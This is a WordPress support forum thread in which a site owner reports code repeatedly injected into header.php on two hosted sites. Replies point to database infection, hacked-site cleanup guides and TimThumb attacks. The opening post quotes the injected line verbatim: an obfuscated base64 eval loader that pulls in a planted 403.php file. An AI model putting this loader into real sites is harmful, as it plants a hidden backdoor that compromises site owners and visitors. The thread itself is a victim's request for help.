Title: Hacked: Code inserted into header.php
Last modified: August 20, 2016

---

# Hacked: Code inserted into header.php

 *  [coopersita](https://wordpress.org/support/users/coopersita/)
 * (@coopersita)
 * [14 years, 9 months ago](https://wordpress.org/support/topic/hacked-code-inserted-into-headerphp/)
 * Hi,
 * I get the following code inserted into my header.php in 2 separate sites (both
   hosted on Dreamhost):
 * `<?define('USE_DIRA', '/wp-includes/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs
   ="));?>`
 * Before, the directory was going to the images folder in the default theme, but
   I deleted the theme, deleted the code, and it appeared again, but now pointing
   to the images folder in wp-includes.
 * In those images folders, 2 files were uploaded: 403.php and links.db.
 * I changed all my passwords (db user, and dreamhost login). WordPress is up to
   date.
 * I’ve deleted the code twice, and it comes up again.
 * Any ideas on how they are getting in?

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [14 years, 9 months ago](https://wordpress.org/support/topic/hacked-code-inserted-into-headerphp/#post-2265568)
 * likely the code is in your database somehow
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
 * [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 *  [MickeyRoush](https://wordpress.org/support/users/mickeyroush/)
 * (@mickeyroush)
 * [14 years, 9 months ago](https://wordpress.org/support/topic/hacked-code-inserted-into-headerphp/#post-2265576)
 * Sucuri.net discovered that the TimThumb attacks are infecting the header.php 
   files now as well. May or may not be related to your issue(s).
 * [http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html](http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html)

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Hacked: Code inserted into header.php’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [hacking](https://wordpress.org/support/topic-tag/hacking/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 2 replies
 * 3 participants
 * Last reply from: [MickeyRoush](https://wordpress.org/support/users/mickeyroush/)
 * Last activity: [14 years, 9 months ago](https://wordpress.org/support/topic/hacked-code-inserted-into-headerphp/#post-2265576)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics